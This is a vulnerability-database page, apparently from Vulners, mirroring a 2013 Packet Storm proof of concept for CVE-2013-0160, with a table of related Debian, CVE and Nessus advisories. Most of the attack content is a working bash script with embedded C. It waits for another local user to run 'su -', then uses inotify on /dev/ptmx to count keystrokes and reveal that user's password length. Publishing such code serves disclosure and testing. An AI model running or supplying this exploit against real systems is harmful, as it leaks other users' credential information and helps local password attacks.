Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Inter-Keystroke Timing Proof Of Concept

🗓️ 31 Jan 2013 00:00:00Reported by vladzType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 55 Views

Keystroke timing attack to determine local user password length using ptmx. PoC tested on Debian 6.0.5 (kernel 2.6.32-5-amd64).

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure
5 Feb 201300:00
zdt
ATTACKERKB		CVE-2013-0160
18 Feb 201304:41
attackerkb
CVE		CVE-2013-0160
18 Feb 201302:00
cve
Cvelist		CVE-2013-0160
18 Feb 201302:00
cvelist
Debian		[SECURITY] [DSA 2669-1] linux security update
16 May 201302:48
debian
Debian CVE		CVE-2013-0160
18 Feb 201302:00
debiancve
Tenable Nessus		Debian DSA-2669-1 : linux - privilege escalation/denial of service/information leak
17 May 201300:00
nessus
Tenable Nessus		openSUSE Security Update : kernel (openSUSE-SU-2013:0395-1)
13 Jun 201400:00
nessus
Tenable Nessus		openSUSE Security Update : kernel (openSUSE-SU-2013:0396-1)
13 Jun 201400:00
nessus
Tenable Nessus		SuSE 11.2 Security Update : Linux kernel (SAT Patch Numbers 7667 / 7669 / 7675)
8 May 201300:00
nessus
Rows per page
`#!/bin/bash  
# ptmx-su-pwdlen.sh -- This PoC determine the password length of a local  
# user who runs "su -". Done thanks to the ptmx keystroke timing attack  
# (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for  
# more information.   
#  
# Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64).  
#  
# "THE BEER-WARE LICENSE" (Revision 42):  
# <[email protected]> wrote this file. As long as you retain this notice  
# you can do whatever you want with this stuff. If we meet some day, and  
# you think this stuff is worth it, you can buy me a beer in return. -V.  
  
if ps -e -o cmd= | egrep -q "^(-|^)su"; then  
echo "[-] Kill/close all running \"su\" session before using this PoC"  
exit 1  
fi  
  
exe=$(mktemp) || exit 1  
tmp=$(mktemp) || exit 1  
  
cat > ${exe}.c << _EOF_  
#include <stdio.h>  
#include <signal.h>  
#include <unistd.h>  
#include <sys/inotify.h>  
  
static int count = 0;  
  
void display_result() {  
  
printf("[+] password len is %d\n", count-1);  
_exit(0);  
}  
  
int main() {  
  
int fd;  
char buf[1024];  
  
signal(SIGINT, display_result);  
  
fd = inotify_init();  
inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY);  
  
while(read(fd, buf, 1024)) count++;   
  
return 0;  
}  
_EOF_  
  
cc -o ${exe}{,.c}  
  
echo "[*] Wait for someone to run \"su -\""  
  
while true; do   
  
ps -e -o cmd= | egrep "^(-|^)su" >${tmp}  
x=$(wc -l ${tmp})  
  
case ${x% *} in  
  
1) (( run )) && continue;  
echo -n "[+] su detected, full command: "  
cat ${tmp}; ${exe} &   
(( run = 1 )) ;;  
  
2) [ ! -z "$!" ] && kill -2 $!; break ;;  
  
esac  
  
done  
  
rm -f ${exe}{,.c} ${tmp}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Jan 2013 00:00Current
6.7Medium risk
Vulners AI Score6.7
EPSS0.00267
keystroke timinglocal userpassword lengthptmxpocdebian 6.0.5kernel 2.6.32-5-amd64
55